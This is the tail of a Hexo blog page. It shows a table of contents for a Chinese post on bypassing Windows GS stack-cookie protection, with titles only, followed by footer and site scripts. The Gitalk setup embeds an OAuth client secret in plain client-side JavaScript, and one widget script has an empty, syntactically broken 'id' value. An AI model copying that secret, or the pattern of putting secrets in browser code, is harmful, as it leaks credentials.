                <a href="https://github.com/Introspelliam" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                    
                      GitHub
                    
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/3008590672" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                    
                      Weibo
                    
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-介绍GS"><span class="nav-text">1.介绍GS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-1-GS工作原理"><span class="nav-text">1.1 GS工作原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-2-不会使用GS的情况"><span class="nav-text">1.2 不会使用GS的情况</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-3-其他栈保护措施"><span class="nav-text">1.3 其他栈保护措施</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-4-Security-Cookie生成细节"><span class="nav-text">1.4 Security Cookie生成细节</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-5-GS优缺点"><span class="nav-text">1.5 GS优缺点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-利用未保护的内存突破GS"><span class="nav-text">2. 利用未保护的内存突破GS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-覆盖虚函数突破GS"><span class="nav-text">3. 覆盖虚函数突破GS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#3-1-测试代码"><span class="nav-text">3.1 测试代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-2-实验原理"><span class="nav-text">3.2 实验原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-攻击异常处理突破GS"><span class="nav-text">4. 攻击异常处理突破GS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#4-1-测试代码"><span class="nav-text">4.1 测试代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-实验原理"><span class="nav-text">4.2 实验原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-同时替换栈中和-data中的Cookie突破GS"><span class="nav-text">5. 同时替换栈中和.data中的Cookie突破GS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#5-1-实验代码"><span class="nav-text">5.1 实验代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-2-实验原理"><span class="nav-text">5.2 实验原理</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Introspelliam</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动</div>

  <span class="post-meta-divider">|</span>

  <div class="theme-info">主题 &mdash; <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.2</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  








  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '41857e5205be9fe36c48',
          clientSecret: 'c927ea37a432eff67cdb1081658112c7409ca7ff',
          repo: 'Introspelliam.github.io',
          owner: 'Introspelliam',
          admin: ['Introspelliam'],
          id: location.pathname,
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')           
       </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  <script type="text/javascript">
  wpac_init = window.wpac_init || [];
  wpac_init.push({widget: 'Rating', id: ,
    el: 'wpac-rating',
    color: 'fc6423'
  });
  (function() {
    if ('WIDGETPACK_LOADED' in window) return;
    WIDGETPACK_LOADED = true;
    var mc = document.createElement('script');
    mc.type = 'text/javascript';
    mc.async = true;
    mc.src = '//embed.widgetpack.com/widget.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(mc, s.nextSibling);
  })();
  </script>


  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config("");
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="custom_mathjax_source">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->
  


  

  

</body>
</html>
